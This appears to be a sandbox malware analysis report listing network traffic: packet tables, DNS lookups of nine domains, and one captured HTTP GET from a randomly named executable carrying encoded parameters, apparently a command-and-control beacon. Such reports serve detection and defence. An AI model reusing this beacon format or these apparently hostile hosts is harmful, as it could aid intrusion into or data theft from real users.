                                Jul 3, 2024 18:04:00.606297016 CEST8049724203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:00.606358051 CEST4972480192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:01.517646074 CEST4972480192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:02.536685944 CEST4972580192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:02.541654110 CEST8049725203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:02.541908979 CEST4972580192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:02.543895960 CEST4972580192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:02.552167892 CEST8049725203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:02.552177906 CEST8049725203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:03.138504982 CEST8049725203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:03.138618946 CEST8049725203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:03.138694048 CEST4972580192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:04.048943996 CEST4972580192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.067996979 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.072951078 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:05.073079109 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.074975967 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.079875946 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:05.841337919 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:05.841444969 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:05.841738939 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:05.841773987 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.842009068 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.844307899 CEST4972680192.168.2.8203.161.62.199
                                Jul 3, 2024 18:04:05.849181890 CEST8049726203.161.62.199192.168.2.8
                                Jul 3, 2024 18:04:10.912760019 CEST4972780192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:10.917471886 CEST804972735.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:10.917548895 CEST4972780192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:10.919620037 CEST4972780192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:10.924421072 CEST804972735.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:11.541342974 CEST804972735.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:11.542907953 CEST804972735.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:11.542970896 CEST4972780192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:12.423806906 CEST4972780192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:13.443131924 CEST4972880192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:13.447927952 CEST804972835.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:13.448024988 CEST4972880192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:13.450201035 CEST4972880192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:13.454916954 CEST804972835.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:14.093307972 CEST804972835.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:14.094753027 CEST804972835.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:14.098112106 CEST4972880192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:14.955374956 CEST4972880192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:15.974194050 CEST4972980192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:15.979716063 CEST804972935.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:15.979804993 CEST4972980192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:15.981758118 CEST4972980192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:15.986673117 CEST804972935.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:15.986721039 CEST804972935.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:16.609276056 CEST804972935.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:16.609302044 CEST804972935.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:16.609456062 CEST4972980192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:17.486363888 CEST4972980192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:18.505532980 CEST4973080192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:18.511661053 CEST804973035.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:18.514199972 CEST4973080192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:18.518006086 CEST4973080192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:18.522875071 CEST804973035.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:19.137834072 CEST804973035.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:19.139214993 CEST804973035.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:19.139261961 CEST4973080192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:19.143106937 CEST4973080192.168.2.835.214.213.30
                                Jul 3, 2024 18:04:19.150130987 CEST804973035.214.213.30192.168.2.8
                                Jul 3, 2024 18:04:32.242001057 CEST4973180192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:32.247056961 CEST8049731104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:32.248501062 CEST4973180192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:32.252095938 CEST4973180192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:32.257219076 CEST8049731104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:32.831449986 CEST8049731104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:32.832201958 CEST8049731104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:32.832259893 CEST4973180192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:33.751916885 CEST4973180192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:34.770916939 CEST4973280192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:34.776134968 CEST8049732104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:34.776232004 CEST4973280192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:34.777998924 CEST4973280192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:34.784121990 CEST8049732104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:36.283308029 CEST4973280192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:36.288733006 CEST8049732104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:36.288851976 CEST4973280192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:37.303585052 CEST4973380192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:37.308516026 CEST8049733104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:37.308592081 CEST4973380192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:37.310643911 CEST4973380192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:37.315629005 CEST8049733104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:37.316063881 CEST8049733104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:38.084608078 CEST8049733104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:38.085520029 CEST8049733104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:38.085630894 CEST4973380192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:38.814531088 CEST4973380192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:39.832695007 CEST4973480192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:39.837627888 CEST8049734104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:39.843580008 CEST4973480192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:39.843580008 CEST4973480192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:39.848392010 CEST8049734104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:40.564845085 CEST8049734104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:40.566793919 CEST8049734104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:40.570441008 CEST4973480192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:40.570441008 CEST4973480192.168.2.8104.21.10.169
                                Jul 3, 2024 18:04:40.575465918 CEST8049734104.21.10.169192.168.2.8
                                Jul 3, 2024 18:04:45.908063889 CEST4973580192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:45.912914038 CEST804973564.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:45.916256905 CEST4973580192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:45.920260906 CEST4973580192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:45.925812960 CEST804973564.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:46.563389063 CEST804973564.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:46.563467026 CEST804973564.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:46.566148996 CEST4973580192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:47.423832893 CEST4973580192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:48.446023941 CEST4973680192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:48.451001883 CEST804973664.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:48.451096058 CEST4973680192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:48.454025030 CEST4973680192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:48.459075928 CEST804973664.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:49.106913090 CEST804973664.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:49.107214928 CEST804973664.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:49.107259989 CEST4973680192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:49.957236052 CEST4973680192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:50.974622965 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:50.980256081 CEST804973764.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:50.980340958 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:50.982621908 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:50.987405062 CEST804973764.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:50.987970114 CEST804973764.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:51.669588089 CEST804973764.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:51.722047091 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:51.775770903 CEST804973764.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:51.778301001 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:52.486550093 CEST4973780192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:53.506146908 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:53.511102915 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:53.511240005 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:53.513322115 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:53.518090010 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.183583975 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.183805943 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.183816910 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184003115 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.184118986 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184132099 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184448004 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184459925 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184469938 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.184489012 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.184489012 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.184748888 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.185415983 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.185430050 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.185545921 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.188992977 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.189039946 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.189052105 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.189371109 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.189398050 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.189524889 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.278367043 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278435946 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278490067 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278589010 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.278728962 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278733969 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278738022 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.278903961 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.279356003 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.279603958 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.279618979 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:54.279685020 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.282741070 CEST4973880192.168.2.864.190.62.22
                                Jul 3, 2024 18:04:54.287568092 CEST804973864.190.62.22192.168.2.8
                                Jul 3, 2024 18:04:59.760180950 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:04:59.765315056 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:04:59.774022102 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:04:59.778023005 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:04:59.784974098 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:00.410116911 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:00.410136938 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:00.410149097 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:00.410347939 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:00.410944939 CEST8049739199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:00.414030075 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:01.283171892 CEST4973980192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:02.302032948 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:02.307035923 CEST8049740199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:02.310158014 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:02.311620951 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:02.316536903 CEST8049740199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:02.789774895 CEST8049740199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:02.789808035 CEST8049740199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:02.789896011 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:02.789928913 CEST8049740199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:02.789978027 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:03.814547062 CEST4974080192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:04.833162069 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:04.838049889 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:04.838124037 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:04.840353966 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:04.845278025 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:04.845401049 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:05.300086975 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:05.300261974 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:05.300297976 CEST8049741199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:05.300324917 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:05.300364971 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:06.345834970 CEST4974180192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.368858099 CEST4974280192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.373744011 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:07.373814106 CEST4974280192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.375452995 CEST4974280192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.380723953 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:07.837610006 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:07.837707996 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:07.837836981 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:07.838027954 CEST4974280192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.842025042 CEST4974280192.168.2.8199.59.243.226
                                Jul 3, 2024 18:05:07.846858978 CEST8049742199.59.243.226192.168.2.8
                                Jul 3, 2024 18:05:13.321770906 CEST4974380192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:13.327263117 CEST8049743124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:13.327348948 CEST4974380192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:13.329483986 CEST4974380192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:13.334357977 CEST8049743124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:14.845880032 CEST4974380192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:14.895817041 CEST8049743124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:15.868361950 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:16.876899004 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:16.877362967 CEST8049744124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:16.877439022 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:16.879718065 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:16.881932974 CEST8049744124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:16.881973982 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:16.884577990 CEST8049744124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:18.392604113 CEST4974480192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:18.439914942 CEST8049744124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:19.411587954 CEST4974580192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:19.417032957 CEST8049745124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:19.417138100 CEST4974580192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:19.419594049 CEST4974580192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:19.424550056 CEST8049745124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:19.424933910 CEST8049745124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:20.923841000 CEST4974580192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:20.971857071 CEST8049745124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:21.946064949 CEST4974680192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:21.953948975 CEST8049746124.156.180.97192.168.2.8
                                Jul 3, 2024 18:05:21.955974102 CEST4974680192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:21.955975056 CEST4974680192.168.2.8124.156.180.97
                                Jul 3, 2024 18:05:21.963807106 CEST8049746124.156.180.97192.168.2.8

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 3, 2024 18:03:13.622546911 CEST6135753192.168.2.81.1.1.1
                                Jul 3, 2024 18:03:14.404848099 CEST53613571.1.1.1192.168.2.8
                                Jul 3, 2024 18:03:30.912005901 CEST5741453192.168.2.81.1.1.1
                                Jul 3, 2024 18:03:30.927629948 CEST53574141.1.1.1192.168.2.8
                                Jul 3, 2024 18:03:44.286246061 CEST6264253192.168.2.81.1.1.1
                                Jul 3, 2024 18:03:44.337229967 CEST53626421.1.1.1192.168.2.8
                                Jul 3, 2024 18:03:57.443521023 CEST5360953192.168.2.81.1.1.1
                                Jul 3, 2024 18:03:57.464946985 CEST53536091.1.1.1192.168.2.8
                                Jul 3, 2024 18:04:10.849781036 CEST5188253192.168.2.81.1.1.1
                                Jul 3, 2024 18:04:10.909770966 CEST53518821.1.1.1192.168.2.8
                                Jul 3, 2024 18:04:24.162022114 CEST5505953192.168.2.81.1.1.1
                                Jul 3, 2024 18:04:24.173734903 CEST53550591.1.1.1192.168.2.8
                                Jul 3, 2024 18:04:45.588644028 CEST5501153192.168.2.81.1.1.1
                                Jul 3, 2024 18:04:45.903309107 CEST53550111.1.1.1192.168.2.8
                                Jul 3, 2024 18:04:59.290019989 CEST6214853192.168.2.81.1.1.1
                                Jul 3, 2024 18:04:59.755037069 CEST53621481.1.1.1192.168.2.8
                                Jul 3, 2024 18:05:12.853142977 CEST5701553192.168.2.81.1.1.1
                                Jul 3, 2024 18:05:13.317466974 CEST53570151.1.1.1192.168.2.8

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 3, 2024 18:03:13.622546911 CEST192.168.2.81.1.1.10xe74cStandard query (0)www.thirstythursdaywines.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:30.912005901 CEST192.168.2.81.1.1.10xa49fStandard query (0)www.aotuqiye.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:44.286246061 CEST192.168.2.81.1.1.10xc8c4Standard query (0)www.marinestoreng.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:57.443521023 CEST192.168.2.81.1.1.10x12ebStandard query (0)www.zethcraft.infoA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:10.849781036 CEST192.168.2.81.1.1.10x2474Standard query (0)www.herplaatsingscoach.comA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:24.162022114 CEST192.168.2.81.1.1.10x3e61Standard query (0)www.tapnly.onlineA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:45.588644028 CEST192.168.2.81.1.1.10xcf40Standard query (0)www.tutoringservices-jp.spaceA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:59.290019989 CEST192.168.2.81.1.1.10x6381Standard query (0)www.mommysdaycare.netA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:05:12.853142977 CEST192.168.2.81.1.1.10x3e11Standard query (0)www.kwytruband.cloudA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 3, 2024 18:03:14.404848099 CEST1.1.1.1192.168.2.80xe74cNo error (0)www.thirstythursdaywines.com38.207.228.45A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:30.927629948 CEST1.1.1.1192.168.2.80xa49fNo error (0)www.aotuqiye.com104.21.10.169A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:30.927629948 CEST1.1.1.1192.168.2.80xa49fNo error (0)www.aotuqiye.com172.67.146.32A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:44.337229967 CEST1.1.1.1192.168.2.80xc8c4No error (0)www.marinestoreng.commarinestoreng.comCNAME (Canonical name)IN (0x0001)false
                                Jul 3, 2024 18:03:44.337229967 CEST1.1.1.1192.168.2.80xc8c4No error (0)marinestoreng.com131.153.148.82A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:03:57.464946985 CEST1.1.1.1192.168.2.80x12ebNo error (0)www.zethcraft.info203.161.62.199A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:10.909770966 CEST1.1.1.1192.168.2.80x2474No error (0)www.herplaatsingscoach.com35.214.213.30A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:24.173734903 CEST1.1.1.1192.168.2.80x3e61Name error (3)www.tapnly.onlinenonenoneA (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:45.903309107 CEST1.1.1.1192.168.2.80xcf40No error (0)www.tutoringservices-jp.space64.190.62.22A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:04:59.755037069 CEST1.1.1.1192.168.2.80x6381No error (0)www.mommysdaycare.net199.59.243.226A (IP address)IN (0x0001)false
                                Jul 3, 2024 18:05:13.317466974 CEST1.1.1.1192.168.2.80x3e11No error (0)www.kwytruband.cloud124.156.180.97A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.thirstythursdaywines.com
                                • www.aotuqiye.com
                                • www.marinestoreng.com
                                • www.zethcraft.info
                                • www.herplaatsingscoach.com
                                • www.tutoringservices-jp.space
                                • www.mommysdaycare.net
                                • www.kwytruband.cloud

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.84971338.207.228.45805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:14.420327902 CEST356OUTGET /bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.thirstythursdaywines.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:03:15.560422897 CEST1236INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:15 GMT
                                Server: Apache
                                Upgrade: h2
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c [TRUNCATED]
                                Data Ascii: 2000<html dir="ltr" lang="zh"> <head> <meta charset="utf-8"> <meta name="color-scheme" content="light dark"> <meta name="theme-color" content="#fff"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title></title> <style>/* Copyright 2017 The Chromium Authors. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ a { color: var(--link-color); } body { --background-color: #fff; --error-code-color: var(--google-gray-700); --google-blue-100: rgb(210, 227, 252); --google-blue-300: rgb(138, 180, 248); --google-blue-600: rgb(26, 115, 232); --google-blue-700: rgb(25, 103, 210); --google-gray-100: rgb(241, 243, 244); --google-gray-300: rgb(218, 220, 224); --google-gray-500: rgb(154, 160, 166); --google-gray-50: rgb(248, 249, 250); --google-gray-600: rgb(128, 134, 139); --google-gray-700: rgb(95, 99, 1 [TRUNCATED]
